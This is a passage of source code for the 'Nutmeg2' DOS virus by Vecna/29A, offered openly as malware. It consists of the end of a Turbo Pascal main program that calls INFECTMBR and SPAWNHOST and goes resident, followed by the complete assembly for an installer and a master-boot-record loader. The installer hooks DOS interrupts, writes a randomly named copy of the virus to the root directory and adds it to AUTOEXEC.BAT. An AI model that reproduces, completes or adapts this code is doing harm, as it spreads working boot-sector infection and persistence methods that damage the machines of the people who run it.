DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
@OVERBUFFER:
POP DS
END;
END;
BEGIN
INITALL;
INFECTMBR;
SPAWNHOST;
IF NOT(RESIDENT) THEN BEGIN
MEML[$0:$350]:=$20FF20FF;
SETINTVEC($28,@VIRUSINT28);
KEEP(0);
END;
END.
;(Cut here)-------------------------------------------------------------------
;[Nutmeg2] virus by Vecna/29A
;Installer
;
;These routines add to the AUTOEXEC.BAT a random named virus sample, and
;write this virus sample to the root dir. To do this, it hook interrupt 0x1C,
;wait for DOS load and hook interrupt 0x21. This hook wait for a file execute
;and then read the virus code and write it to the disk as a file, and then
;modify AUTOEXEC.BAT to execute this file. All interrupts hook are restored
;after use, and only 1 kilobyte is subtracted from memory. The virus sample
;is executed with a "!" as single parameter. This is done to warn the virus
;to disinfect AUTOEXEC.BAT.
.MODEL TPASCAL
.386P
.CODE
ORG 0
PUBLIC LOADER
LOADER:
MOV DI, OFFSET MUTATE-OFFSET LOADER
MOV CX, 8
NCHAR:
IN AL, 40H
AND AL, 01111B
ADD AL, 'A'
DB 2EH
STOSB
LOOP NCHAR
PUSH 0
POP DS
MOV AX, OFFSET INT1C-OFFSET LOADER
MOV SI, 1CH*4
MOV DI, OFFSET OLD1C-OFFSET LOADER
CLD
CLI
XCHG AX, WORD PTR DS:[SI]
DB 2EH
STOSW
MOV AX, CS
XCHG AX, WORD PTR DS:[SI+2]
DB 2EH
STOSW
STI
XOR EAX, EAX
MOV DWORD PTR DS:[21H*4], EAX
MOV ES, AX
MOV BX, 7C00H
MOV AX, 201H
MOV CX, 2
MOV DX, 80H
INT 13H
DB 0EAH
DW 7C00H
DW 0
INT1C:
PUSH DS
PUSHAD
PUSH 0
POP DS
MOV CX, WORD PTR DS:[21H*4+2]
CMP CX, 800H
JA NOT_YET
JCXZ NOT_YET
MOV ESI, 21H*4
MOV EDI, 0FFH*4
MOV EAX, DWORD PTR DS:[ESI]
MOV DWORD PTR DS:[EDI], EAX
MOV AX, CS
ROL EAX, 16
MOV AX, OFFSET INT21-OFFSET LOADER
MOV DWORD PTR DS:[ESI], EAX
MOV EAX, DWORD PTR CS:[OLD1C-OFFSET LOADER]
MOV DWORD PTR DS:[1CH*4], EAX
NOT_YET:
POPAD
POP DS
DB 0EAH
OLD1C DD 0
INT21:
PUSH DS
PUSH ES
PUSHAD
ALL_PUSHED:
PUSH 0
POP DS
CMP AX, 4B00H
JNE NO_4B00
EXECUTING:
MOV EAX, DWORD PTR DS:[0FFH*4]
MOV DWORD PTR DS:[21H*4], EAX
MOV AX, CS
SUB AX, 1000H
MOV ES, AX
MOV AX, 200H+(4096/512)
XOR BX, BX
MOV CX, 5
MOV DX, 80H
INT 13H
JC ERROR
MOV AH, 3CH
MOV CX, 10B
PUSH CS
POP DS
MOV DX, OFFSET FNAME-OFFSET LOADER
INT 21H
JC ERROR
XCHG AX, BX
PUSH ES
POP DS
XOR DX, DX
MOV AH, 40H
MOV CX, 4096
INT 21H
JC ERROR
PUSH CS
POP DS
MOV AH, 3EH
INT 21H
MOV AX, 3D02H
MOV DX, OFFSET FNAME2-OFFSET LOADER
INT 21H
JC ERROR
XCHG AX, BX
MOV AX, 4202H
XOR CX, CX
CWD
INT 21H
MOV AH, 40H
MOV CX, FSIZE-1
MOV DX, OFFSET FNAME-OFFSET LOADER
INT 21H
JC ERROR
MOV AH, 40H
MOV CX, FSIZE2
MOV DX, OFFSET PARAMS-OFFSET LOADER
INT 21H
JC ERROR
ERROR:
MOV AH, 3EH
INT 21H
NO_4B00:
POPAD
POP ES
POP DS
INT 0FFH
RETF 2
FNAME DB "C:\"
MUTATE DB 8 DUP (0)
DB ".EXE", 0
FSIZE EQU $-OFFSET FNAME
PARAMS DB " !", 13, 10
FSIZE2 EQU $-OFFSET PARAMS
FNAME2 DB 'AUTOEXEC.BAT', 0
END LOADER
;(Cut here)-------------------------------------------------------------------
;[Nutmeg2] virus by Vecna/29A
;MBR loader
;
;This piece of code reside in the MBR of a infected system. It just create a
;stack, steal one kilobyte from 0x0:0x413, and read and jump the installer
;in this hole.
.MODEL TPASCAL
.CODE
ORG 0
PUBLIC MLOADER
MLOADER:
JMP SKIPMSG
DB "[NUTMEG2] by Vecna/29A"
SKIPMSG:
CLI
XOR BX, BX
MOV SS, BX
MOV SP, 7C00H
STI
PUSH BX
POP DS
DEC WORD PTR DS:[413H]
INT 12H
MOV CL, 6
SHL AX, CL
PUSH AX
POP ES
MOV AX, 202H
MOV CX, 3
MOV DX, 80H
INT 13H
JC $
PUSH ES
PUSH BX
RETF
DB 'This virus was written in Brasil, in 1998'
END MLOADER